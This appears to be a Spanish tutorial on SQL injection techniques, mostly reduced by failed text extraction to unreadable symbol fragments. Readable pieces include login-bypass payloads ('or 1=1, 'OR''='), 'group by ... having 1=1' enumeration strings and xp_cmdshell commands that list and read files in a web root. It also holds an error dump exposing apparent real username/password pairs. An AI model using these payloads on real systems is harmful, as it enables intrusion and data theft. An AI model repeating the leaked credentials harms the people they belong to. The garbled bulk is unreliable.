Tecnicas de SQL Injection
Tecnicas de SQL Injection
!
#$%&
"
'
" * +"
(
,# .
/
"0#$%
'
"
, *
) 1 % )" + !
"
, *
, ")
- **
2 #$% '
"- " "
3 #$% 4
)
?
@
B
C
) 5
,
! )
%"
"
5 "
67"
* 8*
"
. 5 9 ", #
:)
*
*
#.
8<
+
"
" )
>; ) 5
4 '
" ;
4 #
!
4 ! ', *
#$% 4
: "'
"
' "
"A
"
*
"+%
"'
; "
A " "' ) "
5.
"
""
"
/
;
" =
"
"
" .>
", "
"
" 8<
" "
"
"
"
"
"
"
"
)4
" 7
# )
"
"
+ =
)
& " +
. "
!
.
7
&
"
"+
"
9
&
"
" "
. "
( "
&
D
"
9 &
"
"
*
6
"
6
.
"
" 6 ( ""
" 4 ""
"
7<
"
) "
"
" "
"
&"
"
"& "=
. (( #
2
;
" "
"
*
5
"
.
"
6 " .
"
"
" 6
"
&
"
(
"
")
* 9
"
7 " 6 (&
. 4 #$%&
" "
" "
" *
"
"
"
!% & '
5 *
"
D
C 2
.
6 " .
'
"
* 9
"
" 9 ( " ) 4
&
"
* )
4 "
"
%
#8$ 8%
*
*
&
!
% .
. =
4 " " "
"
+&
"& +
"
D "
"
"
&
.
"
)
" "
(
&
"
"
"
)4
"
) 4 )
6
9
"
( )
"
+
8 . "
6 7 "
6 " . "&
"
&
"
>#
"
"
) "
"
9
. 4 #$% " 6
E#+) " & :
+
"
51#
CB@ +
"
9
"
.& 9
+" " ")
"
"
"
. 4
"& 9
"
") " "
.
"
4
"
. 4
+ % . . >
*
6
D
C &
#8$ 8%
#$% E#
$ + % . . F
" D "
,-
&
9
9
+ =
*
<F
#: * "
" 6"
.=
.
"
. 4
4
"
6 "
. 4 "
"
"
*
CB
" #$%BC + #$%C &
"
6
"
"
"
6
.
"
"
"
"
"
"
&
"
"
)
6 "
"
>!
#$%>
"
9
4 "
) )
"
6
"
" . "
4 " "=
9
"
#$%2
.
6
"& 9
"
+
6 6 "
6
. 4
(
) * # +,
$ ( " " "
"
" ) "
"
" 9
- +
" *&
) 4 ) 4
"
"
9 " =
" "
=
,:# !
9
"&
9
" *
"
& " )
) 4
9 "
6 "
2
G
" E,
.
*
&
" 6 "
"
"
"
""
F&
" *
) "
D= " " )
" ) :# & " "
" )
"
)
"
.
" 6
"
!'
"
"
%51
3
5
) &
( ) "
"C &
9 "
& )
9
. )
"
6"
9
4
& "
9
" )
*
" . =
"
6 6 "
# &
)
" 6 "
2F
" 9
" *
9
"
)
:# 2
%
"
)
7
" 9
" ") "
) "
"
9
"
8
""
:#
"
6 &
6
'
"
9
&
- "
*
"
"
"
, "
"
6 "6 "
"
#$% @
&
"
"
.
"
"
"
"
"
.
"
" "&
"
"&
"-
.#
'
*
"
" .
) =
.
9
6 "& +
9 6
"
"
"
" .
)
"
"
#+) "
:#
+
9
"
" 1;& +
" *
0 "
"
#0#$%& ) 4
&
"
"
F&
"
"
"
6 "
#$%
.
&
"
" *
)
-
6 "
)
" 1;> H "
D CC2
"
&"
"
G
&
#+) "
)=
" "
"
E#$%
6 "
"
.
"
"
) "
" 1;
67"
"
CCB
.
)
9
9 " )
" - "
9 "
. "
" .
" "
D CC
=
" * #$% # 6 3 *
( "
"
) >
( =
& +
9
=
( )
.
"9
"
.
6
, "
G
&
"
" *
"
"
"
:#
" )
7"
"
"
&"
*
*
"9
" *&
2
G
" 1;
" .
"
9
"
"
E!
9
) 4 =
"
*
9
9
#$% # 6
& "
" "
"
"
""
<
" *&
*
"
"& "
" "
"
.
+
) "
"
?
# )
4
)6
")
& *
" "
) =
+
"
" #$% )
" &
"
"
) "
"
. 9
.
&
"9
"
"
&
"9 &
"
)
"
) 4
"
E' "
" "
"
#0#$% # 6 & 9
"
)
" ) 4
.
&
"
"
J
6"
8
6
"
"
"
)
&
"
"
.
"
"
"
.
)4
"
%#
"
&
"
6 &
.
"
"
" #0#$%& "
" "&
9
8
"
>#5> +
"
8
)
<
"
#$%
9
"
#0#$% 9
" 9 "
"
"
5
E8"
# 6 &
5
) "
+ )
"
.
=
<
<
6 "
"
""
&
"
9
(
) "
+*
"
"
"
"
" .
) " "
" I
+
) 4
&
"
&
*
"
6
#0#$% # 6 &
""
6
"
"
1 % )"
+ =
"
"
"
"
"& ) = "
4 "
"
) 4
"
"
"
"
"
)7
&
" E#51& 5
; M& !N #!N& ;'!&
(
9
" 9 "
"
& "
" " ;'! ! + 1
!
"
&
"
"
+
F
*
4
4
"
"
"
"
"
"&
.
"
"
)
" )
"9
"
9
.
"
= &
9
(.
"
"6
4 " EIF
"
) "
" "&"
6 . "&
"
4
"
"6
"
".
" *
.
"
> > EKKF
"
"
"
"
6
7
"&
+ " 6
""
"*
( 1
( * $#
#0#$%
6
L"&
.
"
"
"
#0#$%
"
#5 "
"
"
<
"
"
") "
" "
;
"
"
"
"
"
"
&
" 6
;'! 332
.
"
"
" 9
"
#0#$%
.
)9
#0#$%
*
6 "
6 #$% E!
4
7
& "
6
"&
"6
)
" "
=
#5
"
9
""
#$%
)7
"&
;:,:#
"
"
" D "
"
.
"
"
"
"
"
"
"
"
) "
" *
"
"
+ (
&
,#))
;
, 6
% *
#$% # 6 > O#$% # 6
"*
"
- ** "
"
" > 8"
9
"
" *
6
P
&
,!
"
)
<
" "6
"
"
"
"
+"
"
")
"
"
"
"
"
)
!
" Q
" Q
" Q .
"
<
"
"
"
"
&
"
"
) **
#$%&
>
M . 8< " G
) **
" )
"
>" 6Q
* EF>
""
Q M9
Q
"
Q <
Q" "9 "
Q"9 .
6= "
&
"
")
")
" < =
> E #-1 B303B 022CB0@F
)
<
<
<
<
<
<
"
6 "&
"
"
"
"
"
# )
*
"
"
9
*
"
#$% # 6
9
)
". *
>;
! *
" "
, ")
1: < "
" + "
"
"
"&
"
"
+
"
>
M . 8< "
" 9
Q
Q"
Q "
Q
" "
6
"
<
<
<
<
"
6)
-"""
" Q "
" Q
"
+
+
+
""
"
>&
"
G
(
"
"2
% &
"
"
"
6
"
"
)
& #$% "
*
" <"
"
"
:
& ; " 0#$%
"& < "
.
"
& "
" "
.
"
% &
/ 51;
8H:R8
,81S
+%
++
"&
"
"
"
(
" "
" "
"
6
.
.# .
&
6 " ) "&
" =
) " =
"
" ) " . .
*
"
"
*
#!
.# .
." "
"
"* .
.
"
."
"6
" "
."
"
&
) "
"
J
*
"
*
"
"
"9
) "
"
"
"+
"
)
) "
"
"
"
"
%! # #!
(
A :
G 8 8
(
(
/ : ! -S
5H 1/
: ,8 -S
"
&
.
.
6
"
.# .
+ )
"
"
*
,8%8;8
""
+
(
!,5;8
%! # #!
% "
"
" "
1#8 ;
5
" E!%0#$%
" *F
"
(
+
"
"
"
"
(
8
5%;8
#8%8';
"
(
(
(
% &
' 85;8
, :!
% &
. 4
(
(
"
"
"
*
" ." "9
"
.
"
< "
)
" ."
" 6
"
"
"9
)
" 6
"
" ." ""
"
" =* "
9
) " "*
.
" ." ""
"
"
*
"9
B
3
% &
T
U
TU
TV
UV
V
-8;G881
% R8
1
+
,"
.
.
9
+
(
.
*
"
9
9
9
9
6
"
(
(
"
."
"
) "
"
4 & !
"
"
"
."
"
) >; ) >F
&
"
"
"
"&
"
"
"
. 4 #$%& "
"
" !
4
"
# )
"
&
"
"
&
6
"
"
#$% "
"
=
& "
"
"
"
"
""
"
4
"
"
"
#$%
&
. *
" )
&
"
&
7
9
"
+
4
"
*
"*
& "
"
6 " 9
+
.
"
9
")
"5
#
#
67
"
H
)
")
" 9
=
"
&
"
'
"
.
8
&
>&
"
"
"
9 "& " .
" >5 9 "
9
*
6 &
"
"9
" #$% )
"&
"
C
"
"
" )
" " =
# )
&
)4
<
"
" )
" .
*
" *
" "
"6 "
"
"
") " " "
" 6
"
9
.
" *
"
"
"
!
.
4
"
"
. 4
. "
)4 6
" &+
"
"
"
) 4
*
( 6!
# )
) "
&
"
"
9
8"
"
4
#$%&
5
+
>#$%
#0#$%&
" *
"
"
"".
"
"
" 8
"
" =
"
*
.
9 .
)4 6
"
>
"
"9
&
" "
J
"
"
&
9
<
"
8"
"
"
"
"
&) 4
"
"
.
&
"
"
"
&
"
#
! 6 . "
#$%
"
"
" 7
.J
.
&
"
.
"
"
0 8*
"
05 9 ", #
0 :)
*
0 8<
+
0'
" ;
,
J
#
9
"
" !
"
"&
& "
6"
<
9 "
"
"
6
+
9
)
7<
". *
"
6
"9
9
. "
&.
"
"*
+ ""
) "
"
"
" 6
" )
"
4! $ (! &
9
"
" 6
.= "
"
"
"
"
"
"G
"
"
"
5#!
=" " 9
&*
"
<
"
"
" 6
"
<
"
* "& "
".
*
"
" =*
*
# 6 "
) " "
" #0
G
"
9
*
"
"
( "
7<
"
"
"
+
6
"9
(
"
8"
"
= "
"
&
"9
"
"
"
9
"
)
6"
"
"
) "
&
" "
*
" D
:M&
"
" " "
"
"+
8
"
"
"
"
&" "
6
"
"&
"
)
6 (
&
"
"
""
"
"
"
6
)& "
) "
" 6
"
"
"
9
"
" : %
*
"
)
"
&
+ =
) "
"
"
.
.
<
"
.J
6
"
"
" *
9 "
"
"
"
&
"
)9
"
"
)&
" 6
"& + " )
. "
"
) M.
"
*
"
*
*
"
"
"
6
""
"
"
"
"
"&
)7
;
+ =
6
6
" )
) 4
"
"
6"
) "
"
"
"
"
*
.
) "
* .
9
+
"
J
.
"
"
"
"
. " "
. &) "
" 6
"
"
5#!
"
"
F 8
+
6
"
"
"
&
(
"
. " "
.
5#!
) "
" E!
*
; %& 9
) "
"& .
; % + 6 6
&
*
&
"
. " "
*
6
+
. "=
<
*
) )
"
"
"
6 "
6 6
"
" "
"
.
"
"II )
&
"
4
(
"
&
"
"= +
"
"
" .
&" .
&
"
&
) )
"
"
<
"
%
"
)
"
"
"
http://www.objetivo.com/libreria.asp?edicion='Noviembre'
!
"
" & "
"
"
" ) +
)
"
"
L1 6
) L " "
"
"
) 4
.
"*
" "
"
%
9
"
=
+
"
"
"
"
"
.= EN,F
)7 " "
6
.
5#! 9
8 "
" &
+
) )
.
)
"
"
"
. 9
*
6 " 6
.
"
&
"
9
=
>&
.
&
"
) "
" "
"
"
9
.
& "
"
" "*
"
"
"
"
*
"
)
7
"
"
+ " +
"
9
+
) "
#$%
5
"
&
E'
"
" "
F
) "
"
" !
"
% L E'
"
4
&"
+
9
"
)
*
+
F "
"&
"
"
""
" "
) 4
"
" )
L
"
")
+
" * #$% # 6
"
"
*
6
9
"
9
6
"" "
#$%
9
*
"
"9
4
(
" 4
&
"
.
"
"
=
.
"
"
"
" +
&
"
"
"
"
)
"
Usuario : An'gel
Password : 338xD
) "
"
"
" .
" ""
&
"
(
""
"
9
"
"
"
"
username = 'An'
edicion = 'N'
% . & ".
"&
"
"
5
"
9
"
""
8
"
9
"
#$%& *
"
" = "
&
"
67"
" 4
"
"
+
&
"
.
"
4
"
9 9
"
#$% # 6
( &
&
". *
"
"
L5 L + L1L II
9
.
"6"
) "
"+ "
"
*
"
"
(
9
6
"
"
"9
.J
6
"
%& "
" "
&
(
* "
"&
.
"
8" "
"
) "
8
"
*
"
+
"
") " "
"
"
"
6 &
6 6
"
.
) =
& 9
"
"
)7 " ".
9 "
7
"
"
# 6
" . #$%
(
(
6
)
"
E84
"
)4
.
"
.
& " 6
9
" " "
+
) 4
" "
" . &
"
6 "&
" *
"
9
" "
&
) )
"
"
)"
"
"
"
"
"
. "
.
"
.J .
"
"
"
&
7<
)
"
&
<
"
4
9
)7 & "
"
"
" 6
"
"
"
?
>8
# 6
>F
"6 "
9
+
#$%
" 6 )
" " 9
"&
9
) "
" ) 4 + "
(
"
' " '
&
"
) 4 >
. #$%
> EH
B
*
" +
"
"F
9
"
"
*
.
".
"
<
2
1
%
&
'
+!
0
(#)*
,
-.
%
,
123
% &
)
"
&
&
)
+
"
(
"
*
" I
"" "
) "
"
+ =
"
&
"9
""
"" .
)4 6 6
6
"
"
!8 (
.
" 7
"
#$% 4
.
"
9
" " "& 9
; %& 5#!& & "
" " 6 ( 9
# 6 '
" 9
"
)
"&
6
) & "
&
4
& .
&
6
" "*
"
" &
) "
"
)
.
"
*
.
.
>.
. >F
" > )
"6
"
"&
" "& +
"9
.J ) "
E!
" ."
>
>% "
'
">
"
) "
"
"
"
"
" "
;:,5 *
" " 6 (
"
(
&"
.
"
=
&
"
.
.
"
"
"
"&
"
"
" "
"
9
7
= "
" "6
"
)
" " * " *
"
)
6
& "=
" "
"
"&
.
"
"
+ =
"
.
" 7
&
6
" # )
& 1: )
)
"
"
&
"6
"
"
) E8"
"
" )
6 "+
.
F
+ =
)
. "
"
"
"
. "
"
"
<
#$%
"&
.J "
"
+
) 4
*
" EH > % "
'
">F
" >
"
& "
6
" " 9
)7
">
" )
) "
"
6
"
6=
"> "
*
*
"
"&
+J
" &
.
"
. " =
) "
9 "
3
$
(!
6)
"
"
"
"
"
"
"+
"
" "
* "
6"
"
H 7
"
"
! "
*
=
"
.
"&
"
"
.
#$%
""
"
. I) &
E> L >F
*
" )
6
"
+
"
(!
"
.J
"
"
"
"6"
+
"
9
"
"
6
+ =
)
*
) &
3(
"
& #
" : 0% &
"
" "+
"
.= & ! . "
" " D "
9
6" +
) " <
"
"+*
" " "
"
&
9
4 4 4
)
"
.
"
4 " "
"
"
" "" "
" )
"&
9
"
"& "
. "
"
6"
*
.
5 "
"
"
" &
)
)
*
"&
)
. "
"
+
* "&
" " )
6 " "
"
"
*
"
.
!
6
"
"
. *=
"
"
"
"
"& : 0%
.=
""
$
! .
86
,
*
"
"
"
) &
"
8"
"
* .
<
"
. *=
size=2>Nombre</FONT></B></TD>
<TD><B><FONT face="Arial, Helvetica, sans-serif"
size=2>Clave</FONT></B></TD></TR>
<TR bgColor=#ffcccc>
<TD><INPUT name=USERNAME> </TD>
<TD><INPUT type=password value="" name=PASSWORD>
</TD></TR>
<TR align=middle bgColor=#ff0066>
<TD colSpan=2><INPUT type=submit value=INGRESAR!
name=SUBMIT>
</TD></TR></TBODY></TABLE><BR><BR></FORM></TD>
<TD vAlign=top align=left width=10> </TD>
<TD vAlign=top align=left width=140>
<TABLE cellSpacing=0 cellPadding=0 width=140 border=0>
<TBODY>
---- Extracto ------------------------------------------!
"
9
.
*
5#! E!
"9
) &"
9 6
"
"
" "
)
.
(
"
" &
) 4
&
" F
. "
(
; %
. " " &
" " "
"
"
"
9
*
+
"
#$% " 6
"6"
"& +
"
"
"&
"
"
"
"
) "
(
"
"9
"
+
(
""
"
<"
6
9 =
6
)
)
"
*
"
"
4
=
"
"
#$%
"
"
" D
"
"
I :M&
"
+
'or 1=1
"
6
"
.
"
"
"&
.
"
@
1
"
""
.
"
"
6 6
+ =
<"
"
"
"
" "
"
"6
E
""
"
"
&
F&
,
0
Usuario : 'OR''='
Password : 'OR''='
5
4/
'
)
" > "
# )
"
&
"
">&
"
#$%
"&
.
+
"
<
"
(
" .
+
&
#.
""
+
"
6 .
"
4
)4
.
"
& "
"
&
"
6
+
> 00 > E, )
&
#$% 9
.
" "
6 &
.J
"
& "
"
6 "
&
6 4 .
F
"
" "
9 6 .
"
6"
"
"
"&
"
" .
"
>5
>
9
>
<"
> "
= &
"
"
"
"
" "
"
"= + " .
"
&
"6"
"
9
4
) 6
F
"
"
+
&
) )
"
"
">L>
" + > 00 > E, ) /
F
"
< "&
" )
"
"
"
">
"
) 4)
5 "
#$%
6 . "
"
"
'
*
+ =
$ 7! .
"
+
" )
"
"
.
"
"&
9
6
"
"
"
*
"
) 4
"
" 9
6
" *
"
6 .
.
""
5
6
"
"
>
"
9 "
<
+
"
" .
""
"
6
"
&
"
)
"
9 D
"
(
)
* "
)
)
"
"
"
<
"
" )
9
" .9
&
"
"
)
) "&
"
"
.
". *
1
"
"
) "
6 " )4
) "
" )4
"
"
8
". *
6" "
"
%
#
#$% # 6 &
+
"
&
" 6 . "
" 6
& "
>
"
& " ) +>
>
" "
) "
" #$% # 6
"
"&
"
"9 "
"
"
"
)
"
> 9 "
+
*.
" "
"
"
E'
+ <
" F& " "
"
"
"
" " .
&
. 9
"
" ) " "
"& +
" 9
"
"
&
4
&
"
6
"
" "
"
" 6 " "
"
& " 6 "
4
& "
+ *
"
" )
"
<
6 . &
" "
" .
"
'
;
""
6
##$%#8 H8
<
>< Q
)
"
)Q
"&
"*
. & "
*
"
$ 7! .
"
"
" "
17 !
"
".
& ) 4
! "
"
"
" *
"& +
" *
) "
"
8
4
.J
" " "& "
" " ) "+
B
. 6 9# +
&
% " 9 " , .
# 6
&
"
6"
"
"
"
" E8 "
"
) "
=
"&
4
"
(
+ ( & F
5
9
*
6
9
"
"
"
6
" &6
9
4
" "
)
"
"9
.J
4
"
&
.
" " 6
.
&
+
M
#$%&
"
"
&"
" " D "
" E' =
" 5
9
" 9 "
.
"
" 6
"
&
"
=
8
"
.
"
"6"
"
. 6 9
J
"
" "
)
&
"
"
&
F
&
*
" 9
*
&
&
EH
"
) )
)
&
'
6
"
*
>8*
.J
&
9
7
"
> "
&"
"
"
"> "
! 6
&
"
+
) (
, # "
" )
"&
"
"
"
"
&
"
&
"
"9
. "
>F &
"
. "
9
"
"
9
"
"
"
5"= +
6
"
&
.
) = "
&
+
1
67
)
: 3(
! ) )
7
"
) &
#$%
4
"
D
# )
"
"
"
"
.
& 4/
.
!
#&
" *
"
"
"
"
(
& "
" ")
" 9 )
" :,-' :%8 ,4 "
#$% # 6
.
"
9 &
&
"
" "E
)
"6
&
+
"
"
"9
"&
"
)
. "
) "
"
) "
. 7<
"
"
&
( = &
9
"
"
C
"9
1
"
"
"6
) "
&
"
"
"9
) "
! "
"
"
" D
6
6") "
. "
&" "
&+
"
6 ("
"&
+*
"
.1)
8
6
"9
*
" "
" 6 (
".
> L > E'
*
"
"
4
#
"
"
"
<
"
"
"
&
"
"
F
"
& 6
"
"
"
" .
&
:)6
%
"
E
2 !
3 8
?
.
1
"9
" <
" * #$%
<
) "
" "
>
)Q )
>F
"
*
)Q )
&
)
) "
"
(
" "
" "> . >
&
"
"
:,-'
"
" 9
"
6 +
:,-' 8
"
)Q
"
"
6"
"
"> "
.
>
*
3
%
)
010.8#* - "3.9$
(")-#)
123
:;<<
DB_Sql {
$Host
= "";
$Database = "";
$User
= "";
$Password = "";
$UseODBCCursor = 0;
$Link_ID
$Query_ID
$Record
$Row
var $Errno
var $Error
=
=
=
=
0;
0;
array();
0;
= 0;
= "";
"
"
. &"
*
*
A
*
"
)Q )
"
"
"
>" " >
" 6
) " X " + X! ""
"
9
"
( " " "
. "
"6
&
.
" 6
4
*
. 9
& " "& 9
*
9
9 6
"
" + 6
&
"
" .
"
"
.
"
"
<
9
"
" )
E8 "
"
F
:
) &
*
/
:M& 6
"
"
* 6
"
"&
*
+ "
"
"
+
. &
" 9
4
.
"
"
"
"
"
"
"
#$%&
6 "
" 6
"
) "
"
"
!
9
#$%
) "
9
" "
4
)
"
) "
"
.
"
*
"
"
"
"
6
"
"
#$%
"
4
"
&
"
&
"
"
! " 9
6 4 6 "
" )
"
) "
"
#
"6
"
"&
"
"
&
" "
) < 9
"
"
"
(
6
+)
"
"
"
9
"
"
B
"
*
"
7
"
9 D "
<
&
"
" 9
" 6 " " "
;;!
"
)4 6 & "
6 "
<
&
&
".
*
"'
"+%
) 4
9
7
"
<
""
"
"
"
" 6
% E8
"'
".
"
.
" 9
"
;;!
M
"F&
E5 .
. =
6
" "&
"
6 &
"
*
"
(
"
"
&
9
)
"
"
8" *
+
" *
" **
*
F&
.
" D " *
"
"
;;!
*
E8 "
" * # +1 &
"
.
"
) )4 6
. "
" E5 .
) " " " F& "
6
"
"
>! ""
>
Y
Y
H
*
-
&
"
! "
" "
*
(
*
8
"
. "
""
<
6
"
"
"
+
&
6 6
" ) "
!
"
"
"
*
9
"
7
) 4
!:#; )
<&
"
"
.
" .
+
)
"
)
> L > E'
9
"
"
"
F
&
*
" 6
"
)
"
"
"
E 6 .& .
6
""
(
>
" >
">
#$%&
" *
6
9 #$% E
4
:%8 ,-F )
"
"
"
6
" "
"
"
>
"
)4
H 6
(
"
"
> "
.
" .
" **
) "
9
)
"
4
!:#; 9
> "
"
"
<
"
6
6
" )" 6
6
(
"
)+&
" #$% 9
"
' " "
" *
"
9
< &
"
4
"&
" 4 " *
6 "
" "
" 6=
"
"
"
*
(
"
2
1
.
$
"
)*1(
5*'>
!
"
"
)
"
)
"
"
% )
9 6
6"
>
"
"
"
"
6
!
\
]
5
!
[
0
^
Q
9
6=
"
6
"
"
"
& +6
(
9 "
"
"
Z 0
Z?'
Q
<& "
"
9
"
"
6"
9
"
;;!
"
Z
Z2Z25
[ Z
Z2,
Z '
Z B
Z C
Z28
Z2'
"
- M# "
"
9
"
"
"
"
"
=
"
!:#;&
"
+
'
#
!
+'
, "!
"
8"
#.
.
'
! 7 ""
! 7 ""
+
OO
V
&
E
F
U
T
:MK
6
""
(
6
6=
"
&+ 6
"
"
"
)
"9
"
"9
)
!
"
"
"
*
"
H
"
9
6"
"
"
9
4
"
*
&
"
""
"
"
"
+
"
"
"
"
" *
"
"
> 6 .>&
"
& "
"
7
)
KK "
"
" 4 "
)
) "
E # 5 :#F& "=
"
5
"
"
9
6 6
"
"&
"
6
"
)7
"
9
&
&
"
=
:,-'
(
)
*
) &
" *
< +
(
"
"
"
"
"
6 !:#;
"
" )" 6 9
#$% # 6
" 6 6
*
"
"
.
" E " ,F
"
"
)
.
= &
*
"
# 5 :#
"
&6
"
".
"
"
#.
"
"
> . " >
> 6 >
"
&
" 9
"
# 5 :#&
.= & "
"
" 9
" )
"
>.
"
)+>
"
"
# 5 :#
"
"&
"
+
8" " =
"
> 6 .>
" )
,
"
)
*
"
"
"+
"
'group by usuarios.UserID,usuarios.UID,usuarios.Nombre
having 1=1
#!
'group by usuarios.UserID,usuarios.UID,usuarios.Nombre,
usuarios.Email having 1=1-#!
9 =&
" )" 6
"
+
)
".
> "
"8
> 8
9
" 9 & )
" .
*
)
" .
"
>
>
"
( "
#8%8'; .
E/
"1
F A=4 " 9
"
" !:#; ;;! 1: "
&"
9
"
" "
6
.
"
" "
"
) "
"& 4
6 9
#$%
6
+
E8"
" L.
6 . V 00F
,
*
"
)+
&
"
"
&
)
9
"
"
"
,& "
"
9
"
"
"
"
,& "
&
"
"
"
"
" "
" "
(
'
"
"
"
"1
) & "
*
"8
"
) &
" "
"" . "
9 ;:,:# "
"
#8%8'; .
&
"
"&
"
"
#8%8';
"
+ 9
*
" II 6
"
4
< " #
" "
.
(
)
=
" ) =
.
*
"+
)
7
"
"
"
E8"
"
>& >
<"
>
?> E, *
"
>#8%8'; _ A : ` a>
"
"
"
"
7
F "
(
. "
"
) "
>
>.
)+> + > 6 .>F "
> + >
2>&
"
9
"
="&"
* )
" "
"
"
"
"
"
) "
"
" III H
"&
(
"
+
=
9
"
" # *
"
(
"
.
&
"
"
+
% .
"
1 :1
"
.
+ 9
"
"
"
&
"
"
"
" ) "
""
#S#:-b8';# + #S#':%
1#
"
> ,>
*
9
" )
"
6
(
"
;:! E8 "
"
F %
" "
"
(
1
6
9 "
" 6
"
#8%8';
7 " "& "=
*
9 )
6 "
"
B
4
;:!&
"
"
;:! F
;:,:#
6
!:#;
%
" 9
"
"
.
)4
)
)
"
"
"
"
"
"
"
"
" &
"
"
" E!
>F
" >
!
"
&
"
"
"
"
"
" "
+J
")
"
"
.
(
"
.#
5
".
#&
&
6
"& "
)
"
&
"
"
&+
" &
) "
"
&
>#
9
)7 "
" " % .
"
D
*
"
"
*
"
"
+
" 6 (
9 "
"
) "
) + "
" 9
"
#$% > 1 :1>&
"
6
.
" "
EF> "
# )
"
1 :1
"
"
"
" >) " ">
. 4 #$%&
" 9
" J
" *
"& " )
J
6 " ) "
" !
4
&
"
1 :1& "
"
"
>
" "
"
"
" ) "
"
!
"
EF&
" )
"
"
*
"
"
J
>&
"
)
.
C
5
9
(
"
"4
) "
&
"&
"
".
" .
"
"
"
" 6
"
< +
"
+
"
"
"& .
!:#;
"
<
6
".
"
" 6
"
=
6 & )
)4
1
"
"
"
"
&
9
"
"
I8
, )
)
"
"
,>
9 "
" 6
E>
"
" "
&
"
"
"
9
6
"
4
4
" "
"
F
1:&
" 9 =
6 :,-'
"
" )
9
( "
" "
"
"
"
"
)
& "=
&
2
"
" 6
" #$% ) "
#$%KK&
"
8
"
"&
"&
"
"
"
"
)
#
"
"
"
"
)
" E! "
"
"
"
+
) "
"9 ".
"
&
.
"
""
"& "
.
#$% ! . *
& )" 6
1 &(
!
# 5 :#
6
" D
"
"
6
, "
.
)
"
&" *
"& "
"
)4
"
" "
" #$%
1 :1& 9
"
"
"
( & ; !: ,8 ,5;: 9
" "
9 "
#$% "
"
(!
*
"
9 "
<
="
>#
>
& #$% "
"
"
"
4
"
"
<
"
&
"
"
"
"
"
"
"
"
"
8
"
I
#$%
"
+
"
" 9
1H5 ' 5
" "
) "
"
+
"
"
"
<
"
!
&
"
> > .
>
" E!
.J
&
"
" "&
"
"
)
"
"
)
"
)
"
"
6"
"
>
>&
9 ;:,5 *
"
)4 6 & b 1;5
)
+8
>
.
" ,
&
"
&
9 F
.
.
"
&
""
.
)
6
"
"
EA
7
"
+
>5 6
6
"
" 6"
4 # #
"
" " # )!% #,
"
" "
."
,
"
" " ! ) ! *
"
" " ! *
M
"
" " ! * "
"
" " ! <#
"
'
"
.
-
"
"
" 4
" F
"
"
.
&9
"
<
' " 5 +
` a>& #$%
&
6
"
"
"
" 4 "
9
"
" "
" 4 "
*
> ,>
8"
IIF
"
!
:M&
4
*
*
"
(
" )
"& . "
" +
"
"
"
> .
F 9
"
" 9
" .
" " ) "& + " "
*
>86
"&
"
""
"
4
E%
"
9
9 "
+
2
4; !
6 (
" "
" )4
*
"
6 &
#!
!<
#$%&
!&
(!
(
"
"
>)
6
"
) "
" 7
" 9
"
"
(! , 8 .=
.
"&
. &
"
"9
"
"
A=4 " 9
*
4 . "
"
""
(
7
" " "
> $6 3 /
%
#$%
"
*
H 6
.
."
"
6 !:#;
>
*
)
)
.
"
"
"
"
"
) "
)
6
"
*
&
"
(! 6#; !
"
) "
E% 9
"
6
"
"
" *
"6
"
6
"
"
& "
(
*
1;:
9 " .
"
6"
(
F
*
"
" , + !G#
F+6
"
) =
2
H
+
<V
W
<
L
[L L[
<[
-> $6 3 , 8
<6
"[L]L*
6 ( "
#8%8';
EB
"
"
F"
<VLL "
U
<"
< "
(! 6#; !
"
&
"
"
"
<
"
)
"
(
"
*
"L
"
)
"
!:#;
" 4
*
<
00
&
"
"
6
*
:,-' 6 6
.)
"
" "
22
carla/cardie;MonicaA/amorcito;aliciafalcon/baby;dayana/ne
ne;Luz_d/carmen;mguevara/martha;Tiatere1/lima27;CMorena/2
11095;victor...
/Login.asp, line 85
2> $6 3 4! &
6 ( )
(
, :!&
"
"
"
"
(! 6#; !
") "
&
"&
"
)
" .
4
".
!
"
"
6 " "
"& 9
""
"
"
")
." "
"
"
(
"
6
6
" .
)
"9
&"
"
.
" 5
"
"
"9
) "
"
"
&
"
"
"
"""
"&
*
&
" "
"
. .
"
$+6 4
H
"
""
!,5;8
9
"
"
"
.
"
""
6=
!:#;
+
(
"
23
&
+
9
"
"
E5 9
."
9
"
"
#$% # 6 F
!:#;
"
&
"
1 4
$
"
4
"
" "
&
4
1#8 ;& )
&
" "
9 +
" "
"
&
KKKF
9
"&
" "
"
"
"
" 6
"
.
=
"
(
"& +
"9
9
6 "
"
)
"
7
.
"
"
&
"
"
)
"
""
")
"
(
" E'
"
&
(
!
. & +
"
4
. 9
=
6
"
9
" "
2?
5"=
"
".
"
&
"
9
=
(
"
.
" )
"
<"
" " "
" ) "
&
9
" "
"
!:#; 6=
:)6
7<
*
9 "
+
.
"
"
"+" " "
1#8 ;
*
"
4
"
"
+
&
"
+
&
6
"
"
&
!
.
!
.
" 7
"
"
)
" 6"
"
&
<
""
"
"
"
*
6
"*
" >8<
"
#$%
1:
"9
#
!
4
*
"
"
"
*
"
"
)
(
"
&
"
.
" * #$% # 6
">
"
"
$
% "
) "
II
#
"
"
"
6 "
?4;
<
$
" "
"
"
8< "
"
#0#$%& "
")
" 5
.
" "&
#
" & ,%%L" 9
"
&
*
#0#$% )
<
"
"
")
"
"
"
" <
"&
.
2@
"
"
&
"
5
" <
"
"&
" )
" *
"
"
"
N Q
"
> ">
4
"
"
"& "
"" "
" < Q
"
"
K6
" ;;!
) "
" "
"
"
"
"
"9
"
( =
"
"
""
" "
9 "
"
+ "
"
"
6 6= #$%
" ".
"
"
"
"
6
=
" *
"
" *
" "
)
.
4
"
) 4
"
=
)
&6
6
" " =
"
4
& "
"
"
)" 6
"
* "6
"6
" E8 "
"
"
"F
< Q
) 4
")
"
>
>
"
"
< Q
(
"
.
"
"
"
"*
E/
&
.
&
"
"1
&
9
#5
F
"
"
9
"
" & F
"
"
!
"
-- Runs the Windows `dir` command on the web root through xp_cmdshell, the
-- SQL Server extended procedure that hands its string argument to a command shell.
-- NOTE(review): this only works when the injected login may execute xp_cmdshell.
-- Keep the procedure disabled (it is off by default in current SQL Server
-- releases), connect the application with a non-sysadmin login, and alert on
-- cmd.exe started as a child of sqlservr.exe.
EXEC master..xp_cmdshell 'dir c:\inetpub\wwwroot\'
! 6
9
6
-- Prints the source of a server-side page with `type`, which would expose any
-- connection strings or credentials stored in that file.
-- NOTE(review): the statement is wrapped across two lines by the page layout;
-- the path belongs to the same quoted argument.
-- Mitigation: keep secrets out of page source and deny the database service
-- account read access to the web root.
EXEC master..xp_cmdshell 'type
c:\inetpub\wwwroot\alguna_pagina.asp'
!
"
)
-- Copies the system command interpreter into the web-served directory under a
-- different file name.
-- NOTE(review): detection: file-integrity monitoring on the web root, alerts on
-- new executables appearing there, and no execute permission on content folders.
-- The database service account should have no write access to this path.
